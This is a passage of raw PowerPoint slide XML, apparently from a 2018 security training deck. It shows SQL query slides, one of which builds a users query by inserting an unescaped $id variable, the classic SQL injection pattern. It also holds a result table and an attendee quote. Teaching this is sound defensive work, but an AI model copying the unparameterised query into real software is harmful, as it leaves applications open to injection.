            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="46584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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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9"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540"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541" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44054" y="1325990"/>
            <a:ext cx="24878508" cy="4100585"/>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544" name="SELECT first_name, last_name…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367797" y="1730045"/>
            <a:ext cx="9441161" cy="329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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> first_name, last_name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="17374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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="546" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1056078" y="6679517"/>
          <a:ext cx="22271843" cy="5758319"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11132125"/>
                <a:gridCol w="11139717"/>
              </a:tblGrid>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>first_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>last_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Adams</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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No way I’m giving you a quote after you made fun of me in the quote for the last training. Training was good though.”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="3503348"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr i="1" sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“No way I’m giving you a quote after you made fun of me in the quote for the last training. Training was good though.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164"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65"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66" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="171" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11379199" y="8671586"/>
            <a:ext cx="2082801" cy="4172744"/>
            <a:chOff x="1700373" y="0"/>
            <a:chExt cx="2082800" cy="4172743"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1700373" y="0"/>
              <a:ext cx="1625601" cy="1625600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId4"/>
              <a:srcRect l="0" t="0" r="0" b="0"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="Arup Chakrabarti"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2513173" y="223797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FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Arup Chakrabarti</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="170" name="Security Enthusiast Manager"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2513173" y="290274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000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Security Enthusiast Manager</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="True dat."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17129931" y="9037941"/>
            <a:ext cx="1121495"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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>True dat.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="16937772" y="7968797"/>
            <a:ext cx="603389" cy="961297"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="179" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8427039" y="1748766"/>
            <a:ext cx="7529827" cy="1229736"/>
            <a:chOff x="10" y="0"/>
            <a:chExt cx="7529826" cy="1229734"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="174" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="4817" t="4310" r="6540" b="5175"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6331183" y="0"/>
              <a:ext cx="1198654" cy="1223963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21017" h="21600" fill="norm" stroke="1" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8831" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7837" y="5580"/>
                    <a:pt x="6922" y="7200"/>
                    <a:pt x="6799" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6217" y="7200"/>
                    <a:pt x="628" y="8089"/>
                    <a:pt x="111" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-292" y="8401"/>
                    <a:pt x="393" y="9346"/>
                    <a:pt x="2303" y="11283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5080" y="14099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4593" y="17132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4327" y="18798"/>
                    <a:pt x="4022" y="20483"/>
                    <a:pt x="3911" y="20879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800" y="21275"/>
                    <a:pt x="3807" y="21600"/>
                    <a:pt x="3932" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="21600"/>
                    <a:pt x="5606" y="20795"/>
                    <a:pt x="7369" y="19814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
